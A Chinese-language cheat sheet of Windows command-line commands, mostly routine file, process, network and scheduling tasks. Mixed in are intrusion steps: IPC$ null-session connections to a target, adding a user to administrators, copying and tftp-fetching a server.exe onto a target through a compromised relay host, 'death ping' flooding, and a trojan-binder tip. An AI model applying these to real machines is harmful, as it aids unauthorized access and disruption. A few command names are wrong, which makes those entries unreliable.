延时：  ping -n 10 127.0.0.1>nul
结束进程： ntsd -c q -p pid 或 taskkill /f /im 进程 或 tskill 进程
列出所有进程： tasklist 
运行命令： START["title"(标题)]  [/MIN(最小化)] [/MAX(最大化)][/WAIT(等候它结束)] 
打开C盘： explorer c:\
键盘输入： copy con output.txt（CTRL+Z结束）
文件合并： copy 1.txt+2.txt 3.txt
建立目录： md 或 mkdir
删除目录： rd /s（全部） 或 del /s（目录） 或 rmdir /s(全部)/q(直接删除)
显示文件： dir /b（只有文件名）/a（全部）/od（按照修改时间）
目录结构： tree
清屏：  cls
显示内容： type
文件比较： fc 1.txt 2.txt >3.txt
退出：  ^Z
去特殊： ^ 
命令相同： ;
关机：  shutdown -s
退出DOS： exit
运行：  windows +r
添加用户： net user flyer flyer /add
删除用户： net user flyer  /del
禁止共享服务： net stop lanman server
提升权限： net localgroup administrators flyer /add
保密文件夹： mkdir s...\（建立）  rmdir s...\ /s（删除）
日志文件： eventvwr.msc
记事本： notepod
资源管理器： explorer
任务管理器： taskmgr
注册表： regedit
木马捆绑器： iexpress
组策略： regedit
帮助:  /? 或 help
背景颜色： COLOR
IPC空链接： net use \\ip\ipc$ " " /user:" "
IPC非空链接 net use \\ip\ipc$ "密码" /user:"用户名"  
映射磁盘 ： net use h: \\ip\c$ "密码" /user:"用户名" 
映射磁盘 ： net use h: \\ip\c$ 
删除IPC链接： net use \\ip\ipc$ /del  
删除映射： net use h: /del  
建立用户： net user 用户名 密码 /add  
激活用户： net user guest /active:yes  
查看用户： net user  
查看帐户属性： net user 帐户名  
添加权限： net localgroup administrators 用户名 /add 
查看服务： net start  
开启服务： net start 服务名 
停止某服务： net stop 服务名  
查看对方时间： net time \\目标ip  
设置时间同步： net time \\目标ip /set /yes  
局域网共享： net view  
对方局域网共享：net view \\ip  
系统网络设置： net config  
断开共享： net logoff  
暂停某服务： net pause 服务名  
向对方发信息： net send ip "文本信息"   
本地共享： net share 
开启ipc$共享： net share ipc$  
删除ipc$共享： net share ipc$ /del  
删除C：共享： net share c$ /del  
改密码： net user guest 12345 
更改登陆密码： net password 密码 
查看端口： netstat -an
查看用户名： nbtstat -A ip （对方136到139其中一个端口开了的话） 
ping：  ping ip(或域名) -l[空格]数据包大小-n发送数据次数-t一直ping。 
死亡之ping： ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 
查看本地： ipconfig (winipcfg) /all（显示全部配置信息） 
格式化磁盘: format 盘符 /FS:类型:FAT、FAT32、NTFS 
逐屏输出: more 文件名
锁定命令: doskey 要锁定的命令＝字符 (doskey dir=sky)
解锁命令: doskey 要解锁命令=  (doskey dir=)
更改默认端口: tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
网络配置情况: netsh 查看或更改本地网络配置情况
移动:  move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 /y(取消确认)
查看登陆用户: finger username @host 查看最近有哪些用户登陆
telnet： telnet ip 端口 远程登陆服务器,默认端口为23
连接到IP: open ip 连接到IP（属telnet登陆后的命令）
本机telnet: telnet 在本机上直接键入telnet 将进入本机的 在本机上直接键入telnet 将进入本机的
复制:  copy 路径\文件名1 路径\文件名2  /y(取消确认)
网络复制: copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下
隐藏复制： copy 1st.jpg/b+2st.txt/a 3st.jpg 注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 
复制文件目录树：xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
下载文件： tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 
上传文件： tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机 
解析MAC地址： arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 
查看属性： attrib 文件名(目录名) 查看某文件（目录）的属性
改变属性： attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
当前日期和时间：date /t 、 time /t 只显示当前日期和时间，而不必输入新日期和时间
设置环境变量： set 指定环境变量名称=要指派给变量的字符 
显示环境变量： set 显示当前所有的环境变量 
显示环境变量p*：set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
暂停:  pause 暂停批处理程序，并显示出：请按任意键继续.... 
文件中找字符串:findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
查找某文件: find 文件名 查找某文件
更改标题名字: title 标题名字 更改CMD窗口标题名字
cmd颜色: color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
60秒关机: tsshutdn
设备管理器: devmgmt.msc
停止dll文件运行:regsvr32/u*.dll

AT命令:
1、定时关机
　　命令：at 21:00 ShutDown –S –T30
　　该命令运行后，到了21:00点，电脑会出现“系统关机”对话框，并默认30秒延时自动关机。
2、定时提醒
　　命令：at 12:00 Net Send 10.10.36.122与朋友约会的时间到了，快点准备出发吧!
　　其中Net Send是Windows内部程序，可以发送消息到网络上的其他用户、计算机。10.10.36.122是本机电脑的IP地址。这个功能在Windows中也称作“信使服务”。
3、自动运行批处理文件
　　如果公司的数据佷重要，要求在指定的日期/时间进行备份，那么运行：
　　命令：at 1:00AM /Every:Saturday My_BackUp.bat
　　这样，在每个Saturday（周六）的早上1:00点，电脑定时启动My_BackUp.bat批处理文件。My_BackUp.bat是一个你自行编制的批处理文件，它包含能对系统进行数据完全备份的多条命令。
　　4、取消已经安排的计划
　　命令：at 5 /Delete
　　有时候，你已经安排好的计划可能临时变动，这样你可以及时地用上述命令删除该计划（5为指派给已计划命令的标识编号），当然，删除该计划后，可以重新安排。 

choice
0用户按下ctrl+c/break
1用户按下第一个键
255检测到命令行中的错误条件
其它用户按下的有效字符在列表中的位置

find
0查找成功且至少找到了一个匹配的字符串
1查找成功但没找到匹配的字符串
2查找中出现了错误

sort命令：
sort命令按字母顺序排列文本文件或命令的输出。例如，可以使用以下命令对List.txt文件的内容进行排序，并在屏幕上显示结果：
sort<list.txt
在此范例中，sort命令对List.txt文件的行进行排序并显示结果，但不更改文件。要保存sort命令的输出而不是显示输出，请在命令中包含大于号(>)和文件名。例如，可以使用以下命令对List.txt文件的行按字母顺序排序，并将结果存到Alphlist.txt文件中：
sort<list.txt>alphlist.txt
要排序命令的输出，请键入后面带有管道(|)和sort命令的命令。例如，下面的命令对find命令的输出结果进行排序：
find"Jones"maillst.txt|sort
在键入该命令时，Windows2000按字母顺序列出在其中出现"Jones"的行。
带重定向符的合并命令
可以将筛选器命令、其他命令和文件名合并以生成自定义命令。例如，可以使用以下命令存储包含"LOG"字符串的文件名:
dir/b|find"LOG">loglist.txt
Windows2000通过find过滤器命令发送dir命令的输出并将包含字符串"Log"的文件名存储在Loglist.txt文件中。将结果存储为文件名列表（如，A.log、Logdat.svd和Mylog.bat）。
要在相同命令中使用多个筛选器，请使用管道(|)分隔筛选器。例如，下面的命令搜索C盘上的每个目录以查找包含"Log"字符串的文件名，并且每次显示一屏：
dirc:\/s/b|find"LOG"|more
因为使用管道(|)，Windows2000通过find命令发送dir命令的输出结果。find命令只选择包含字符串"Log"的文件名。more命令每次一屏地显示find命令选择的文件名。